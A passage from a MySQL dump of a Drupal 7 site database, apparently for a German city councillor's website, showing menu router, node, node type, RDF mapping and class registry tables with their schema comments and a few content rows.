feed','t','','','a:0:{}',0,'','',0,''),('search','','','search_is_active','a:0:{}','search_view','a:0:{}','',1,1,0,'','search','Search','t','','','a:0:{}',20,'','',0,'modules/search/search.pages.inc'),('search/node','','','_search_menu_access','a:1:{i:0;s:4:\"node\";}','search_view','a:2:{i:0;s:4:\"node\";i:1;s:0:\"\";}','',3,2,1,'search','search','Content','t','','','a:0:{}',132,'','',-10,'modules/search/search.pages.inc'),('search/node/%','a:1:{i:2;a:1:{s:14:\"menu_tail_load\";a:2:{i:0;s:4:\"%map\";i:1;s:6:\"%index\";}}}','a:1:{i:2;s:16:\"menu_tail_to_arg\";}','_search_menu_access','a:1:{i:0;s:4:\"node\";}','search_view','a:2:{i:0;s:4:\"node\";i:1;i:2;}','',6,3,1,'search/node','search/node/%','Content','t','','','a:0:{}',132,'','',0,'modules/search/search.pages.inc'),('search/user','','','_search_menu_access','a:1:{i:0;s:4:\"user\";}','search_view','a:2:{i:0;s:4:\"user\";i:1;s:0:\"\";}','',3,2,1,'search','search','Users','t','','','a:0:{}',132,'','',0,'modules/search/search.pages.inc'),('search/user/%','a:1:{i:2;a:1:{s:14:\"menu_tail_load\";a:2:{i:0;s:4:\"%map\";i:1;s:6:\"%index\";}}}','a:1:{i:2;s:16:\"menu_tail_to_arg\";}','_search_menu_access','a:1:{i:0;s:4:\"user\";}','search_view','a:2:{i:0;s:4:\"user\";i:1;i:2;}','',6,3,1,'search/node','search/node/%','Users','t','','','a:0:{}',132,'','',0,'modules/search/search.pages.inc'),('sites/default/files/styles/%','a:1:{i:4;s:16:\"image_style_load\";}','','1','a:0:{}','image_style_deliver','a:1:{i:0;i:4;}','',30,5,0,'','sites/default/files/styles/%','Generate image style','t','','','a:0:{}',0,'','',0,''),('system/ajax','','','1','a:0:{}','ajax_form_callback','a:0:{}','ajax_deliver',3,2,0,'','system/ajax','AHAH callback','t','','ajax_base_page_theme','a:0:{}',0,'','',0,'includes/form.inc'),('system/files','','','1','a:0:{}','file_download','a:1:{i:0;s:7:\"private\";}','',3,2,0,'','system/files','File download','t','','','a:0:{}',0,'','',0,''),('system/files/styles/%','a:1:{i:3;s:16:\"image_style_load\";}','','1','a:0:{}','image_style_deliver','a:1:{i:0;i:3;}','',14,4,0,'','system/files/styles/%','Generate image style','t','','','a:0:{}',0,'','',0,''),('system/temporary','','','1','a:0:{}','file_download','a:1:{i:0;s:9:\"temporary\";}','',3,2,0,'','system/temporary','Temporary files','t','','','a:0:{}',0,'','',0,''),('system/timezone','','','1','a:0:{}','system_timezone','a:0:{}','',3,2,0,'','system/timezone','Time zone','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('taxonomy/autocomplete','','','user_access','a:1:{i:0;s:14:\"access content\";}','taxonomy_autocomplete','a:0:{}','',3,2,0,'','taxonomy/autocomplete','Autocomplete taxonomy','t','','','a:0:{}',0,'','',0,'modules/taxonomy/taxonomy.pages.inc'),('taxonomy/term/%','a:1:{i:2;s:18:\"taxonomy_term_load\";}','','user_access','a:1:{i:0;s:14:\"access content\";}','taxonomy_term_page','a:1:{i:0;i:2;}','',6,3,0,'','taxonomy/term/%','Taxonomy term','taxonomy_term_title','a:1:{i:0;i:2;}','','a:0:{}',6,'','',0,'modules/taxonomy/taxonomy.pages.inc'),('taxonomy/term/%/edit','a:1:{i:2;s:18:\"taxonomy_term_load\";}','','taxonomy_term_edit_access','a:1:{i:0;i:2;}','drupal_get_form','a:3:{i:0;s:18:\"taxonomy_form_term\";i:1;i:2;i:2;N;}','',13,4,1,'taxonomy/term/%','taxonomy/term/%','Edit','t','','','a:0:{}',132,'','',10,'modules/taxonomy/taxonomy.admin.inc'),('taxonomy/term/%/feed','a:1:{i:2;s:18:\"taxonomy_term_load\";}','','user_access','a:1:{i:0;s:14:\"access content\";}','taxonomy_term_feed','a:1:{i:0;i:2;}','',13,4,0,'','taxonomy/term/%/feed','Taxonomy term','taxonomy_term_title','a:1:{i:0;i:2;}','','a:0:{}',0,'','',0,'modules/taxonomy/taxonomy.pages.inc'),('taxonomy/term/%/view','a:1:{i:2;s:18:\"taxonomy_term_load\";}','','user_access','a:1:{i:0;s:14:\"access content\";}','taxonomy_term_page','a:1:{i:0;i:2;}','',13,4,1,'taxonomy/term/%','taxonomy/term/%','View','t','','','a:0:{}',140,'','',0,'modules/taxonomy/taxonomy.pages.inc'),('toolbar/toggle','','','user_access','a:1:{i:0;s:14:\"access toolbar\";}','toolbar_toggle_page','a:0:{}','',3,2,0,'','toolbar/toggle','Toggle drawer visibility','t','','','a:0:{}',0,'','',0,''),('user','','','1','a:0:{}','user_page','a:0:{}','',1,1,0,'','user','User account','user_menu_title','','','a:0:{}',6,'','',-10,'modules/user/user.pages.inc'),('user/%','a:1:{i:1;s:9:\"user_load\";}','','user_view_access','a:1:{i:0;i:1;}','user_view_page','a:1:{i:0;i:1;}','',2,2,0,'','user/%','My account','user_page_title','a:1:{i:0;i:1;}','','a:0:{}',6,'','',0,''),('user/%/cancel','a:1:{i:1;s:9:\"user_load\";}','','user_cancel_access','a:1:{i:0;i:1;}','drupal_get_form','a:2:{i:0;s:24:\"user_cancel_confirm_form\";i:1;i:1;}','',5,3,0,'','user/%/cancel','Cancel account','t','','','a:0:{}',6,'','',0,'modules/user/user.pages.inc'),('user/%/cancel/confirm/%/%','a:3:{i:1;s:9:\"user_load\";i:4;N;i:5;N;}','','user_cancel_access','a:1:{i:0;i:1;}','user_cancel_confirm','a:3:{i:0;i:1;i:1;i:4;i:2;i:5;}','',44,6,0,'','user/%/cancel/confirm/%/%','Confirm account cancellation','t','','','a:0:{}',6,'','',0,'modules/user/user.pages.inc'),('user/%/contact','a:1:{i:1;s:9:\"user_load\";}','','_contact_personal_tab_access','a:1:{i:0;i:1;}','drupal_get_form','a:2:{i:0;s:21:\"contact_personal_form\";i:1;i:1;}','',5,3,1,'user/%','user/%','Contact','t','','','a:0:{}',132,'','',2,'modules/contact/contact.pages.inc'),('user/%/edit','a:1:{i:1;s:9:\"user_load\";}','','user_edit_access','a:1:{i:0;i:1;}','drupal_get_form','a:2:{i:0;s:17:\"user_profile_form\";i:1;i:1;}','',5,3,1,'user/%','user/%','Edit','t','','','a:0:{}',132,'','',0,'modules/user/user.pages.inc'),('user/%/edit/account','a:1:{i:1;a:1:{s:18:\"user_category_load\";a:2:{i:0;s:4:\"%map\";i:1;s:6:\"%index\";}}}','','user_edit_access','a:1:{i:0;i:1;}','drupal_get_form','a:2:{i:0;s:17:\"user_profile_form\";i:1;i:1;}','',11,4,1,'user/%/edit','user/%','Account','t','','','a:0:{}',140,'','',0,'modules/user/user.pages.inc'),('user/%/shortcuts','a:1:{i:1;s:9:\"user_load\";}','','shortcut_set_switch_access','a:1:{i:0;i:1;}','drupal_get_form','a:2:{i:0;s:19:\"shortcut_set_switch\";i:1;i:1;}','',5,3,1,'user/%','user/%','Shortcuts','t','','','a:0:{}',132,'','',0,'modules/shortcut/shortcut.admin.inc'),('user/%/track/navigation','a:1:{i:1;s:9:\"user_load\";}','','user_access','a:1:{i:0;s:17:\"access statistics\";}','statistics_user_tracker','a:0:{}','',11,4,1,'user/%','user/%','Track page visits','t','','','a:0:{}',132,'','',2,'modules/statistics/statistics.pages.inc'),('user/%/view','a:1:{i:1;s:9:\"user_load\";}','','user_view_access','a:1:{i:0;i:1;}','user_view_page','a:1:{i:0;i:1;}','',5,3,1,'user/%','user/%','View','t','','','a:0:{}',140,'','',-10,''),('user/autocomplete','','','user_access','a:1:{i:0;s:20:\"access user profiles\";}','user_autocomplete','a:0:{}','',3,2,0,'','user/autocomplete','User autocomplete','t','','','a:0:{}',0,'','',0,'modules/user/user.pages.inc'),('user/login','','','user_is_anonymous','a:0:{}','user_page','a:0:{}','',3,2,1,'user','user','Log in','t','','','a:0:{}',140,'','',0,'modules/user/user.pages.inc'),('user/logout','','','user_is_logged_in','a:0:{}','user_logout','a:0:{}','',3,2,0,'','user/logout','Log out','t','','','a:0:{}',6,'','',10,'modules/user/user.pages.inc'),('user/password','','','1','a:0:{}','drupal_get_form','a:1:{i:0;s:9:\"user_pass\";}','',3,2,1,'user','user','Request new password','t','','','a:0:{}',132,'','',0,'modules/user/user.pages.inc'),('user/register','','','user_register_access','a:0:{}','drupal_get_form','a:1:{i:0;s:18:\"user_register_form\";}','',3,2,1,'user','user','Create new account','t','','','a:0:{}',132,'','',0,''),('user/reset/%/%/%','a:3:{i:2;N;i:3;N;i:4;N;}','','1','a:0:{}','drupal_get_form','a:4:{i:0;s:15:\"user_pass_reset\";i:1;i:2;i:2;i:3;i:3;i:4;}','',24,5,0,'','user/reset/%/%/%','Reset password','t','','','a:0:{}',0,'','',0,'modules/user/user.pages.inc'); /*!40000 ALTER TABLE `dpl_menu_router` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_node` -- DROP TABLE IF EXISTS `dpl_node`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_node` ( `nid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The primary identifier for a node.', `vid` int(10) unsigned DEFAULT NULL COMMENT 'The current dpl_node_revision.vid version identifier.', `type` varchar(32) NOT NULL DEFAULT '' COMMENT 'The dpl_node_type.type of this node.', `language` varchar(12) NOT NULL DEFAULT '' COMMENT 'The dpl_languages.language of this node.', `title` varchar(255) NOT NULL DEFAULT '' COMMENT 'The title of this node, always treated as non-markup plain text.', `uid` int(11) NOT NULL DEFAULT '0' COMMENT 'The dpl_users.uid that owns this node; initially, this is the user that created it.', `status` int(11) NOT NULL DEFAULT '1' COMMENT 'Boolean indicating whether the node is published (visible to non-administrators).', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp when the node was created.', `changed` int(11) NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp when the node was most recently saved.', `comment` int(11) NOT NULL DEFAULT '0' COMMENT 'Whether comments are allowed on this node: 0 = no, 1 = closed (read only), 2 = open (read/write).', `promote` int(11) NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether the node should be displayed on the front page.', `sticky` int(11) NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether the node should be displayed at the top of lists in which it appears.', `tnid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The translation set id for this node, which equals the node id of the source post in each set.', `translate` int(11) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this translation page needs to be updated.', PRIMARY KEY (`nid`), UNIQUE KEY `vid` (`vid`), KEY `node_changed` (`changed`), KEY `node_created` (`created`), KEY `node_frontpage` (`promote`,`status`,`sticky`,`created`), KEY `node_status_type` (`status`,`type`,`nid`), KEY `node_title_type` (`title`,`type`(4)), KEY `node_type` (`type`(4)), KEY `uid` (`uid`), KEY `tnid` (`tnid`), KEY `translate` (`translate`), KEY `language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COMMENT='The base table for nodes.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_node` -- LOCK TABLES `dpl_node` WRITE; /*!40000 ALTER TABLE `dpl_node` DISABLE KEYS */; INSERT INTO `dpl_node` VALUES (2,2,'page','und','Stadtverordneter Olli Graf',1,1,1415825486,1423658946,1,1,0,0,0),(5,5,'article','und','Termine',1,1,1415951533,1426238608,2,0,0,0,0),(6,6,'article','und','Mitgliedschaften',1,1,1416307887,1418162110,2,0,0,0,0); /*!40000 ALTER TABLE `dpl_node` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_node_access` -- DROP TABLE IF EXISTS `dpl_node_access`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_node_access` ( `nid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The dpl_node.nid this record affects.', `gid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The grant ID a user must possess in the specified realm to gain this row’s privileges on the node.', `realm` varchar(255) NOT NULL DEFAULT '' COMMENT 'The realm in which the user must possess the grant ID. Each node access node can define one or more realms.', `grant_view` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether a user with the realm/grant pair can view this node.', `grant_update` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether a user with the realm/grant pair can edit this node.', `grant_delete` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether a user with the realm/grant pair can delete this node.', PRIMARY KEY (`nid`,`gid`,`realm`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Identifies which realm/grant pairs a user must possess in...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_node_access` -- LOCK TABLES `dpl_node_access` WRITE; /*!40000 ALTER TABLE `dpl_node_access` DISABLE KEYS */; INSERT INTO `dpl_node_access` VALUES (0,0,'all',1,0,0); /*!40000 ALTER TABLE `dpl_node_access` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_node_comment_statistics` -- DROP TABLE IF EXISTS `dpl_node_comment_statistics`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_node_comment_statistics` ( `nid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The dpl_node.nid for which the statistics are compiled.', `cid` int(11) NOT NULL DEFAULT '0' COMMENT 'The dpl_comment.cid of the last comment.', `last_comment_timestamp` int(11) NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp of the last comment that was posted within this node, from dpl_comment.changed.', `last_comment_name` varchar(60) DEFAULT NULL COMMENT 'The name of the latest author to post a comment on this node, from dpl_comment.name.', `last_comment_uid` int(11) NOT NULL DEFAULT '0' COMMENT 'The user ID of the latest author to post a comment on this node, from dpl_comment.uid.', `comment_count` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The total number of comments on this node.', PRIMARY KEY (`nid`), KEY `node_comment_timestamp` (`last_comment_timestamp`), KEY `comment_count` (`comment_count`), KEY `last_comment_uid` (`last_comment_uid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Maintains statistics of node and comments posts to show ...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_node_comment_statistics` -- LOCK TABLES `dpl_node_comment_statistics` WRITE; /*!40000 ALTER TABLE `dpl_node_comment_statistics` DISABLE KEYS */; INSERT INTO `dpl_node_comment_statistics` VALUES (2,0,1415825486,NULL,1,0),(5,0,1415951533,NULL,1,0),(6,0,1416307887,NULL,1,0); /*!40000 ALTER TABLE `dpl_node_comment_statistics` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_node_counter` -- DROP TABLE IF EXISTS `dpl_node_counter`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_node_counter` ( `nid` int(11) NOT NULL DEFAULT '0' COMMENT 'The dpl_node.nid for these statistics.', `totalcount` bigint(20) unsigned NOT NULL DEFAULT '0' COMMENT 'The total number of times the dpl_node has been viewed.', `daycount` mediumint(8) unsigned NOT NULL DEFAULT '0' COMMENT 'The total number of times the dpl_node has been viewed today.', `timestamp` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The most recent time the dpl_node has been viewed.', PRIMARY KEY (`nid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Access statistics for dpl_nodes.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_node_counter` -- LOCK TABLES `dpl_node_counter` WRITE; /*!40000 ALTER TABLE `dpl_node_counter` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_node_counter` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_node_revision` -- DROP TABLE IF EXISTS `dpl_node_revision`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_node_revision` ( `nid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The dpl_node this version belongs to.', `vid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The primary identifier for this version.', `uid` int(11) NOT NULL DEFAULT '0' COMMENT 'The dpl_users.uid that created this version.', `title` varchar(255) NOT NULL DEFAULT '' COMMENT 'The title of this version.', `log` longtext NOT NULL COMMENT 'The log entry explaining the changes in this version.', `timestamp` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when this version was created.', `status` int(11) NOT NULL DEFAULT '1' COMMENT 'Boolean indicating whether the node (at the time of this revision) is published (visible to non-administrators).', `comment` int(11) NOT NULL DEFAULT '0' COMMENT 'Whether comments are allowed on this node (at the time of this revision): 0 = no, 1 = closed (read only), 2 = open (read/write).', `promote` int(11) NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether the node (at the time of this revision) should be displayed on the front page.', `sticky` int(11) NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether the node (at the time of this revision) should be displayed at the top of lists in which it appears.', PRIMARY KEY (`vid`), KEY `nid` (`nid`), KEY `uid` (`uid`) ) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COMMENT='Stores information about each saved version of a dpl_node.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_node_revision` -- LOCK TABLES `dpl_node_revision` WRITE; /*!40000 ALTER TABLE `dpl_node_revision` DISABLE KEYS */; INSERT INTO `dpl_node_revision` VALUES (2,2,1,'Stadtverordneter Olli Graf','',1423658946,1,1,1,0),(5,5,1,'Termine','',1426238608,1,2,0,0),(6,6,1,'Mitgliedschaften','',1418162110,1,2,0,0); /*!40000 ALTER TABLE `dpl_node_revision` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_node_type` -- DROP TABLE IF EXISTS `dpl_node_type`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_node_type` ( `type` varchar(32) NOT NULL COMMENT 'The machine-readable name of this type.', `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'The human-readable name of this type.', `base` varchar(255) NOT NULL COMMENT 'The base string used to construct callbacks corresponding to this node type.', `module` varchar(255) NOT NULL COMMENT 'The module defining this node type.', `description` mediumtext NOT NULL COMMENT 'A brief description of this type.', `help` mediumtext NOT NULL COMMENT 'Help information shown to the user when creating a dpl_node of this type.', `has_title` tinyint(3) unsigned NOT NULL COMMENT 'Boolean indicating whether this type uses the dpl_node.title field.', `title_label` varchar(255) NOT NULL DEFAULT '' COMMENT 'The label displayed for the title field on the edit form.', `custom` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this type is defined by a module (FALSE) or by a user via Add content type (TRUE).', `modified` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this type has been modified by an administrator; currently not used in any way.', `locked` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether the administrator can change the machine name of this type.', `disabled` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether the node type is disabled.', `orig_type` varchar(255) NOT NULL DEFAULT '' COMMENT 'The original machine-readable name of this node type. This may be different from the current type name if the locked field is 0.', PRIMARY KEY (`type`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores information about all defined dpl_node types.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_node_type` -- LOCK TABLES `dpl_node_type` WRITE; /*!40000 ALTER TABLE `dpl_node_type` DISABLE KEYS */; INSERT INTO `dpl_node_type` VALUES ('article','Article','node_content','node','Use articles for time-sensitive content like news, press releases or blog posts.','',1,'Title',1,1,0,0,'article'),('page','Basic page','node_content','node','Use basic pages for your static content, such as an \'About us\' page.','',1,'Title',1,1,0,0,'page'); /*!40000 ALTER TABLE `dpl_node_type` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_queue` -- DROP TABLE IF EXISTS `dpl_queue`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_queue` ( `item_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique item ID.', `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'The queue name.', `data` longblob COMMENT 'The arbitrary data for the item.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'Timestamp when the claim lease expires on the item.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'Timestamp when the item was created.', PRIMARY KEY (`item_id`), KEY `name_created` (`name`,`created`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores items in queues.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_queue` -- LOCK TABLES `dpl_queue` WRITE; /*!40000 ALTER TABLE `dpl_queue` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_queue` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_rdf_mapping` -- DROP TABLE IF EXISTS `dpl_rdf_mapping`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_rdf_mapping` ( `type` varchar(128) NOT NULL COMMENT 'The name of the entity type a mapping applies to (node, user, comment, etc.).', `bundle` varchar(128) NOT NULL COMMENT 'The name of the bundle a mapping applies to.', `mapping` longblob COMMENT 'The serialized mapping of the bundle type and fields to RDF terms.', PRIMARY KEY (`type`,`bundle`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores custom RDF mappings for user defined content types...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_rdf_mapping` -- LOCK TABLES `dpl_rdf_mapping` WRITE; /*!40000 ALTER TABLE `dpl_rdf_mapping` DISABLE KEYS */; INSERT INTO `dpl_rdf_mapping` VALUES ('node','article','a:11:{s:11:\"field_image\";a:2:{s:10:\"predicates\";a:2:{i:0;s:8:\"og:image\";i:1;s:12:\"rdfs:seeAlso\";}s:4:\"type\";s:3:\"rel\";}s:10:\"field_tags\";a:2:{s:10:\"predicates\";a:1:{i:0;s:10:\"dc:subject\";}s:4:\"type\";s:3:\"rel\";}s:7:\"rdftype\";a:2:{i:0;s:9:\"sioc:Item\";i:1;s:13:\"foaf:Document\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:4:\"body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}s:13:\"comment_count\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:num_replies\";}s:8:\"datatype\";s:11:\"xsd:integer\";}s:13:\"last_activity\";a:3:{s:10:\"predicates\";a:1:{i:0;s:23:\"sioc:last_activity_date\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}}'),('node','page','a:9:{s:7:\"rdftype\";a:1:{i:0;s:13:\"foaf:Document\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:4:\"body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}s:13:\"comment_count\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:num_replies\";}s:8:\"datatype\";s:11:\"xsd:integer\";}s:13:\"last_activity\";a:3:{s:10:\"predicates\";a:1:{i:0;s:23:\"sioc:last_activity_date\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}}'); /*!40000 ALTER TABLE `dpl_rdf_mapping` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_registry` -- DROP TABLE IF EXISTS `dpl_registry`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_registry` ( `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'The name of the function, class, or interface.', `type` varchar(9) NOT NULL DEFAULT '' COMMENT 'Either function or class or interface.', `filename` varchar(255) NOT NULL COMMENT 'Name of the file.', `module` varchar(255) NOT NULL DEFAULT '' COMMENT 'Name of the module the file belongs to.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'The order in which this module’s hooks should be invoked relative to other modules. Equal-weighted modules are ordered by name.', PRIMARY KEY (`name`,`type`), KEY `hook` (`type`,`weight`,`module`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Each record is a function, class, or interface name and...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_registry` -- LOCK TABLES `dpl_registry` WRITE; /*!40000 ALTER TABLE `dpl_registry` DISABLE KEYS */; INSERT INTO `dpl_registry` VALUES ('AccessDeniedTestCase','class','modules/system/system.test','system',0),('AdminMetaTagTestCase','class','modules/system/system.test','system',0),('ArchiverInterface','interface','includes/archiver.inc','',0),('ArchiverTar','class','modules/system/system.archiver.inc','system',0),('ArchiverZip','class','modules/system/system.archiver.inc','system',0),('Archive_Tar','class','modules/system/system.tar.inc','system',0),('BatchMemoryQueue','class','includes/batch.queue.inc','',0),('BatchQueue','class','includes/batch.queue.inc','',0),('BlockAdminThemeTestCase','class','modules/block/block.test','block',0),('BlockCacheTestCase','class','modules/block/block.test','block',0),('BlockHashTestCase','class','modules/block/block.test','block',0),('BlockHiddenRegionTestCase','class','modules/block/block.test','block',0),('BlockHTMLIdTestCase','class','modules/block/block.test','block',0),('BlockInvalidRegionTestCase','class','modules/block/block.test','block',0),('BlockTemplateSuggestionsUnitTest','class','modules/block/block.test','block',0),('BlockTestCase','class','modules/block/block.test','block',0),('BlockViewModuleDeltaAlterWebTest','class','modules/block/block.test','block',0),('ColorTestCase','class','modules/color/color.test','color',0),('CommentActionsTestCase','class','modules/comment/comment.test','comment',0),('CommentAnonymous','class','modules/comment/comment.test','comment',0),('CommentApprovalTest','class','modules/comment/comment.test','comment',0),('CommentBlockFunctionalTest','class','modules/comment/comment.test','comment',0),('CommentContentRebuild','class','modules/comment/comment.test','comment',0),('CommentController','class','modules/comment/comment.module','comment',0),('CommentFieldsTest','class','modules/comment/comment.test','comment',0),('CommentHelperCase','class','modules/comment/comment.test','comment',0),('CommentInterfaceTest','class','modules/comment/comment.test','comment',0),('CommentNodeAccessTest','class','modules/comment/comment.test','comment',0),('CommentNodeChangesTestCase','class','modules/comment/comment.test','comment',0),('CommentPagerTest','class','modules/comment/comment.test','comment',0),('CommentPreviewTest','class','modules/comment/comment.test','comment',0),('CommentRSSUnitTest','class','modules/comment/comment.test','comment',0),('CommentThreadingTestCase','class','modules/comment/comment.test','comment',0),('CommentTokenReplaceTestCase','class','modules/comment/comment.test','comment',0),('ContactPersonalTestCase','class','modules/contact/contact.test','contact',0),('ContactSitewideTestCase','class','modules/contact/contact.test','contact',0),('ContextualDynamicContextTestCase','class','modules/contextual/contextual.test','contextual',0),('CronQueueTestCase','class','modules/system/system.test','system',0),('CronRunTestCase','class','modules/system/system.test','system',0),('DashboardBlocksTestCase','class','modules/dashboard/dashboard.test','dashboard',0),('Database','class','includes/database/database.inc','',0),('DatabaseCondition','class','includes/database/query.inc','',0),('DatabaseConnection','class','includes/database/database.inc','',0),('DatabaseConnectionNotDefinedException','class','includes/database/database.inc','',0),('DatabaseConnection_mysql','class','includes/database/mysql/database.inc','',0),('DatabaseConnection_pgsql','class','includes/database/pgsql/database.inc','',0),('DatabaseConnection_sqlite','class','includes/database/sqlite/database.inc','',0),('DatabaseDriverNotSpecifiedException','class','includes/database/database.inc','',0),('DatabaseLog','class','includes/database/log.inc','',0),('DatabaseSchema','class','includes/database/schema.inc','',0),('DatabaseSchemaObjectDoesNotExistException','class','includes/database/schema.inc','',0),('DatabaseSchemaObjectExistsException','class','includes/database/schema.inc','',0),('DatabaseSchema_mysql','class','includes/database/mysql/schema.inc','',0),('DatabaseSchema_pgsql','class','includes/database/pgsql/schema.inc','',0),('DatabaseSchema_sqlite','class','includes/database/sqlite/schema.inc','',0),('DatabaseStatementBase','class','includes/database/database.inc','',0),('DatabaseStatementEmpty','class','includes/database/database.inc','',0),('DatabaseStatementInterface','interface','includes/database/database.inc','',0),('DatabaseStatementPrefetch','class','includes/database/prefetch.inc','',0),('DatabaseStatement_sqlite','class','includes/database/sqlite/database.inc','',0),('DatabaseTaskExce